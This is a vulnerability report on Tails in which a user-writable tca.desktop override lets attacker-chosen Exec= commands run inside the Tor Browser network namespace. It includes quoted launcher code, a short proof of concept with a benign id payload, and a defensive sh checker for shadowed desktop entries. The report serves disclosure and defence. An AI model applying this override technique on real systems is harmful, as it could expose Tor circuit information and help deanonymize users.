attacker can execute code in tor-browser network namespace
See https://git.radicallyopensecurity.com/otf/pen-tails/-/issues/4
This attack applies if an attacker already has amnesia-level privileges and Tor is not yet bootstrapped: in that state /usr/bin/tor-browser falls back to `gtk-launch tca.desktop`, which resolves the desktop file by ID through the XDG search path, so a user-writable copy in ~/.local/share/applications takes precedence over the system one and its Exec= line runs inside the tbb network namespace.
Summary
Impact
The attacker can gain information about your Tor Browser circuits, which could be used to deanonymize the user.
Overall, this will be considered Low in summit#191
Availability
The attack is only available when the attacker has amnesia-level privileges before the user connects to Tor. This requires a persistent attack (i.e. in the past the attacker had amnesia-level privileges and managed to persist themselves into the Persistent Storage), so it needs to be chained with other attacks to be useful.
It also requires user interaction (citation needed).
Details
Relevant code
On /usr/local/lib/run-tor-browser:
exec \
/bin/ip netns exec tbb \
sudo -u amnesia -- \
/usr/local/lib/run-with-env --env-file="${ENVFILE}" --delete -- \
/usr/local/lib/run-with-ibus-and-a11y-bus-proxy -- \
/usr/bin/tor-browser "$@"
On /usr/bin/tor-browser:
if tor_has_bootstrapped || ask_for_confirmation; then
# Torbutton 1.5.1+ uses those environment variables
export TOR_SOCKS_HOST='127.0.0.1'
export TOR_SOCKS_PORT='9050'
start_browser "${@}"
else
gtk-launch tca.desktop
fi
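The following is an added example, not code from Tails: a small POSIX sh check that resolves a desktop-file ID the way the XDG base-directory lookup does (XDG_DATA_HOME first, then each entry of XDG_DATA_DIRS) and flags the case where a user-writable copy shadows the system entry, which is the precondition the fallback `gtk-launch tca.desktop` call relies on. The directory layout, file contents and the `exec_line`, `resolve_desktop_file` and `shadowed_by_user` function names are constructed for the example; only `tca.desktop` comes from the issue.

```shell
#!/bin/sh
# Added example (not part of Tails). Walk the XDG applications/ search
# path in precedence order and report whether the file that would be
# launched for a desktop-file ID is the user-writable override rather
# than the system copy.

# resolve_desktop_file ID DATA_HOME DATA_DIRS
#   Print the first applications/ID found, searching DATA_HOME and then
#   each colon-separated entry of DATA_DIRS. Return 1 if none exists.
resolve_desktop_file() {
    id="$1"; data_home="$2"; data_dirs="$3"
    old_ifs="$IFS"
    IFS=:
    set -- "$data_home" $data_dirs   # split DATA_DIRS on ':' only
    IFS="$old_ifs"
    for d in "$@"; do
        [ -n "$d" ] || continue
        if [ -f "$d/applications/$id" ]; then
            printf '%s\n' "$d/applications/$id"
            return 0
        fi
    done
    return 1
}

# exec_line FILE
#   Print the command the desktop entry would run (first Exec= key).
exec_line() {
    sed -n 's/^Exec=//p' "$1" | head -n 1
}

# shadowed_by_user ID DATA_HOME DATA_DIRS
#   Return 0 when the resolved entry is the DATA_HOME copy and a system
#   copy also exists further down the search path, i.e. a user-writable
#   file overrides the system one. Return 1 otherwise.
shadowed_by_user() {
    id="$1"; data_home="$2"; data_dirs="$3"
    resolved=$(resolve_desktop_file "$id" "$data_home" "$data_dirs") || return 1
    [ "$resolved" = "$data_home/applications/$id" ] || return 1
    # Is a system entry being hidden behind the user copy?
    resolve_desktop_file "$id" "" "$data_dirs" >/dev/null
}

# Constructed fixture (hypothetical paths, not a real Tails system): a
# system tca.desktop plus a user-local copy with a different Exec= line.
fixture=$(mktemp -d)
mkdir -p "$fixture/sys/applications" "$fixture/home/applications"
printf '[Desktop Entry]\nExec=tca\n' > "$fixture/sys/applications/tca.desktop"
printf '[Desktop Entry]\nExec=/tmp/constructed-override\n' \
    > "$fixture/home/applications/tca.desktop"

if shadowed_by_user tca.desktop "$fixture/home" "$fixture/sys"; then
    f=$(resolve_desktop_file tca.desktop "$fixture/home" "$fixture/sys")
    echo "WARNING: $f shadows the system entry; Exec=$(exec_line "$f")"
fi
rm -rf "$fixture"
```

The same functions can be pointed at a live session by passing `"${XDG_DATA_HOME:-$HOME/.local/share}"` and `"${XDG_DATA_DIRS:-/usr/local/share:/usr/share}"`. The mitigation angle is the inverse of the check: a launcher that must run a trusted entry should reference it by absolute system path, or run with a search path that excludes user-writable directories, rather than by a bare desktop-file ID.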
PoC
cp /usr/share/applications/tca.desktop /home/amnesia/.local/share/applications/
# Edit the file and change Exec= to anything you want e.g.
Exec=sh -c 'echo `id`'
# Trigger code exec
/usr/local/lib/run-tor-browser
# example output; the nogroup supplementary group shows we are inside the bwrap sandbox
amnesia@amnesia:~$ /usr/local/lib/run-tor-browser
uid=1000(amnesia) gid=1000(amnesia) groups=1000(amnesia),65534(nogroup)